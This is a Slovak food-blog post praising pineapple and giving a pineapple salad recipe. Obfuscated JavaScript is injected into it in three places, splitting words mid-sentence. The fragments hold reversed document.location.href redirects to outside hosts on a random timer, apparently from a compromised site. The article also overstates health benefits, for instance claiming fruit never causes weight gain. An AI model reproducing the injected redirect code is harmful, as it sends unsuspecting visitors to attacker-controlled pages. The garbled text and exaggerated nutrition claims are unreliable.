Sladká vitamínová bomba

| 28 septembra, 2013 | 0 Comments

Akékoľvek ovocie je zdravé, avšak exotické plodiny z ďalekých tropických krajín majú, aspoň pokiaľ ide o prospešnosť pre ľudský organizmus, predsa len trochu navrch. Zoznam jeho pozitív je siahodlhý; je bohatý na vitamín C, vitamíny skupiny B i beta-karotén, výrazne znižuje riziko trombózy a je vynikajúcim doplnkom pri redukčných diétach.

V karibských krajinách dokonca považujú ananásovú šťavu za nezanedbateľný „povzbudzovač“ sexuálnej túžby. Avšak nie sú toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to len jeho faktické „papierové“ výhody, prečo je spomedzi tropických plodín tak obľúbený a prečo by mal byť súčasťou každého zdravého jedálnička. Jeho gurmánske vlastnosti nijako nezaostávajú.

Je mimoriadne sladký a navyše, keďže ide o ovocie, nijako neohrozuje metabolizmus a nehrozí priberanie. Pripraviť si zdravý a chutný ananásový šalát nie je nič ťažké. Tu je návod, ako na toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to.

Suroviny:

500 g ananásu, 3 cl likéru Malibu, 200 g ľadového šalátu, 250 g broskyňového kompótu, 100 g džemu podľa vlastnej chuti

Postup:

Ananás pokrájame na kocky a necháme variť spolu s likérom asi 4 minúty. Následne pridáme pokrájaný šalát a po 10 minútach necháme vychladnúť. Do väčšej misy dáme odkvapkané broskyne, ananás so šalátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom a zamiešame džem. Necháme vychladnúť v chladničke. Podľa vlastnej vôle môžeme pridať limetku, kiwi či iné prvky neutralizujúce sladkú chuť. Najlepšie sa podáva so sladkým šampanským, prípadne ružovým vínom. Rýchla, sladká a zároveň zdravá dobrota je na svete.

Category: GOURMET, HOMEPAGE